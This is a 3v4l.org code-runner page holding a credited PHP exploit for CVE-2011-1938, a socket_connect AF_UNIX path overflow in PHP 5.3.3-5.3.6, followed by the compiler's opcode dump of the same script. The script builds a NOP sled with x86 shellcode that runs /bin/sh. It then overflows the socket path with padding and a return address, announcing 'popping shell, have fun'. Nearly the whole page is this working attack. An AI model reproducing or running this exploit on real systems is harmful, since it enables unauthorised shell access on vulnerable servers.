3v4l.org

run code in 300+ PHP versions simultaneously
<?php
// Credit: Mateusz Kocielski, Marek Kroemeke and Filip Palian
// Affected Versions: 5.3.3-5.3.6

echo "[+] CVE-2011-1938";
echo "[+] there we go...\n";
define('EVIL_SPACE_ADDR', "\xff\xff\xee\xb3");
define('EVIL_SPACE_SIZE', 1024*1024*8);
$SHELLCODE = "\x6a\x31\x58\x99\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\xb0".
             "\x0b\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x89\xd1".
             "\xcd\x80";

echo "[+] creating the sled.\n";

$CODE = str_repeat("\x90", EVIL_SPACE_SIZE);
for ($i = 0, $j = EVIL_SPACE_SIZE - strlen($SHELLCODE) - 1 ;
     $i < strlen($SHELLCODE) ; $i++, $j++) {
    $CODE[$j] = $SHELLCODE[$i];
}

$b = str_repeat("A", 196).EVIL_SPACE_ADDR;
$var79 = socket_create(AF_UNIX, SOCK_STREAM, 1);
echo "[+] popping shell, have fun (if you picked the right address...)\n";
$var85 = socket_connect($var79,$b);
?>
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 30
Branch analysis from position: 30
2 jumps found. (Code = 44) Position 1 = 33, Position 2 = 25
Branch analysis from position: 33
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 25
2 jumps found. (Code = 44) Position 1 = 33, Position 2 = 25
Branch analysis from position: 33
Branch analysis from position: 25
filename:       /in/Aim44
function name:  (null)
number of ops:  55
compiled vars:  !0 = $SHELLCODE, !1 = $CODE, !2 = $i, !3 = $j, !4 = $b, !5 = $var79, !6 = $var85
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
    5     0  E >   ECHO                                                     '%5B%2B%5D+CVE-2011-1938'
    6     1        ECHO                                                     '%5B%2B%5D+there+we+go...%0A'
    7     2        INIT_FCALL                                               'define'
          3        SEND_VAL                                                 'EVIL_SPACE_ADDR'
          4        SEND_VAL                                                 '%FF%FF%EE%B3'
          5        DO_ICALL                                                 
    8     6        INIT_FCALL                                               'define'
          7        SEND_VAL                                                 'EVIL_SPACE_SIZE'
          8        SEND_VAL                                                 8388608
          9        DO_ICALL                                                 
    9    10        ASSIGN                                                   !0, 'j1X%99%CD%80%89%C3%89%C1jFX%CD%80%B0%0BRhn%2Fshh%2F%2Fbi%89%E3%89%D1%CD%80'
   13    11        ECHO                                                     '%5B%2B%5D+creating+the+sled.%0A'
   15    12        INIT_FCALL                                               'str_repeat'
         13        SEND_VAL                                                 '%90'
         14        FETCH_CONSTANT                                   ~10     'EVIL_SPACE_SIZE'
         15        SEND_VAL                                                 ~10
         16        DO_ICALL                                         $11     
         17        ASSIGN                                                   !1, $11
   16    18        ASSIGN                                                   !2, 0
         19        FETCH_CONSTANT                                   ~14     'EVIL_SPACE_SIZE'
         20        STRLEN                                           ~15     !0
         21        SUB                                              ~16     ~14, ~15
         22        SUB                                              ~17     ~16, 1
         23        ASSIGN                                                   !3, ~17
         24      > JMP                                                      ->30
   18    25    >   FETCH_DIM_R                                      ~20     !0, !2
         26        ASSIGN_DIM                                               !1, !3
         27        OP_DATA                                                  ~20
   17    28        PRE_INC                                                  !2
         29        PRE_INC                                                  !3
         30    >   STRLEN                                           ~23     !0
         31        IS_SMALLER                                               !2, ~23
         32      > JMPNZ                                                    ~24, ->25
   21    33    >   INIT_FCALL                                               'str_repeat'
         34        SEND_VAL                                                 'A'
         35        SEND_VAL                                                 196
         36        DO_ICALL                                         $25     
         37        FETCH_CONSTANT                                   ~26     'EVIL_SPACE_ADDR'
         38        CONCAT                                           ~27     $25, ~26
         39        ASSIGN                                                   !4, ~27
   22    40        INIT_FCALL_BY_NAME                                       'socket_create'
         41        FETCH_CONSTANT                                   ~29     'AF_UNIX'
         42        SEND_VAL_EX                                              ~29
         43        FETCH_CONSTANT                                   ~30     'SOCK_STREAM'
         44        SEND_VAL_EX                                              ~30
         45        SEND_VAL_EX                                              1
         46        DO_FCALL                                      0  $31     
         47        ASSIGN                                                   !5, $31
   23    48        ECHO                                                     '%5B%2B%5D+popping+shell%2C+have+fun+%28if+you+picked+the+right+address...%29%0A'
   24    49        INIT_FCALL_BY_NAME                                       'socket_connect'
         50        SEND_VAR_EX                                              !5
         51        SEND_VAR_EX                                              !4
         52        DO_FCALL                                      0  $33     
         53        ASSIGN                                                   !6, $33
   25    54      > RETURN                                                   1

Generated using Vulcan Logic Dumper, using php 8.0.0


168.71 ms | 1400 KiB | 17 Q